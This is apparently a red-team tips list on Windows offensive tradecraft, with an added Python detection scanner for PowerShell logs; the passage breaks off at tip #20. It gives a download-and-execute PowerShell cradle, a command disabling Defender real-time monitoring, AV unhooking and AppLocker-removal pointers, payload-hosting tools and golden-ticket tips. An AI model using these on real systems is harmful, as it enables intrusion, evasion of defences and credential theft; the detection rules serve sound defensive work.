Red Team Tips

#0: Need good blog posts/references? Consider ired.team, ijustwannared.team, XPN's Blog, https://offensivedefence.co.uk/ and Vincent Yiu's Red Team Tips.

#1 The standard PowerShell download cradle (IEX (New-Object …)) is NOT proxy aware. A far superior alternative is the following one-liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers. They are often overlooked and can easily be exploited for RCE (think potato exploits). NetSPI are experts in DB exploitation: https://github.com/NetSPI. I highly recommend PowerUpSQL if you can manage to load PowerShell undetected.

#3 The commands to list installed AV products are:

PowerShell:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

WMIC:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

#4 Only got a CIFS TGS? You can still use sc.exe to enable/disable/register new services on remote computers.

#5 The command to disable real-time monitoring is
Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).

#6 Unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is
https://ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++

#7 In my honest opinion, https://github.com/skelsec/pypykatz is superior to mimikatz itself for reading out dumps and registry keys. It's Python based, so it works cross-OS. Pretty damn sweet.

#8. Don't use SimpleHTTPServer anymore; use the much better updog instead (it has upload functionality!) https://github.com/sc0tfree/updog

#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to keep snooping eyes away. https://github.com/kgretzky/pwndrop

#10. Need a PowerShell web server for some reason? Use this one! https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
It has script execution, command execution and download functionality.

#11. Need quote escapes in PowerShell? There are a few options: either use a backslash (\) to escape quotes or use encoded commands instead. Pro tip: chaining PowerShell commands works, even when encoded, by just using ";" as a separator between commands, e.g. whoami;whoami /priv

#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? Use .bat or .cmd files like so:

@echo off
REM -noexit keeps the window open; substitute any other PowerShell command you need.
powershell.exe -noexit

#13. PowerShell script to C#? No problem! https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs

#14. Need to get rid of AppLocker (after you bypassed it initially)? https://github.com/api0cradle/AppLocker-Stuff

#15. Using Costura to package your C#? @cobbr says: "Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies"

#16. @0gtweet tweeted an interesting thing: "an undocumented -encodedarguments PowerShell parameter. It may be shortened to 'ea' or 'encodeda'."
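
The commands in tips #1, #3, #5 and #16 are also the strings a detection engineer looks for in PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). The following Python scanner is an added example, not part of the original post; its rules and sample events are constructed here, and the short -ea switch is only flagged on a powershell.exe command line, because inside a script -ea is the -ErrorAction alias.

```python
import re

# Each rule is one command from the tips above, expressed as a case-insensitive regex
# over the ScriptBlockText of a PowerShell script block logging event (Event ID 4104).
RULES = {
    # Tip #5: Defender real-time monitoring switched off.
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I | re.S),
    # Tip #1: WebClient cradle that borrows the logged-on user's proxy credentials.
    "proxy_aware_cradle": re.compile(
        r"DefaultNetworkCredentials.*\bDownloadString\s*\(", re.I | re.S),
    # Tip #16: -encodedarguments and its short forms. Only the powershell.exe command-line
    # form is flagged: inside a script, -ea is the -ErrorAction alias and is benign.
    "encodedarguments_switch": re.compile(
        r"powershell(?:\.exe)?\b[^\n]*\s-(?:ea|encodeda|encodedarguments)\b", re.I),
    # Tip #3: AV product enumeration via root/SecurityCenter2 (client Windows only).
    "av_product_enumeration": re.compile(
        r"SecurityCenter2\b.*\bAntiVirusProduct\b", re.I | re.S),
}

# Constructed sample events, not real telemetry. Events 4 and 6 are benign controls.
SAMPLE_EVENTS = [
    {"id": 1, "text": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 2, "text": "$webclient=(New-Object Net.WebClient);"
              "$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;"
              'IEX $webclient.DownloadString("")'},
    {"id": 3, "text": "powershell.exe -nop -ea UABXAEgA"},  # placeholder base64, not a payload
    {"id": 4, "text": r"Get-ChildItem C:\Temp -ea SilentlyContinue"},
    {"id": 5, "text": "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"},
    {"id": 6, "text": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
]


def scan_event(text):
    """Return the names of all rules that match one script block."""
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_events(events):
    """Map event id -> matched rule names, omitting events with no hits."""
    hits = {}
    for ev in events:
        matched = scan_event(ev["text"])
        if matched:
            hits[ev["id"]] = matched
    return hits


if __name__ == "__main__":
    for event_id, names in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(names)}")
```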

#17. @mpgn_x64 said: "Struggling with golden ticket and access denied? Use 'klist add_bind' command after injecting your ticket with mimikatz or rubeus." (tweet)

#18. Ever needed to know which registry key is edited by an MDM or GPO setting? Check this site: https://getadmx.com/?Category=Windows_10_2016

#19. You'll need local admin rights to change registry keys under HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\

#20. You can pass cmd args from an Explorer window, for example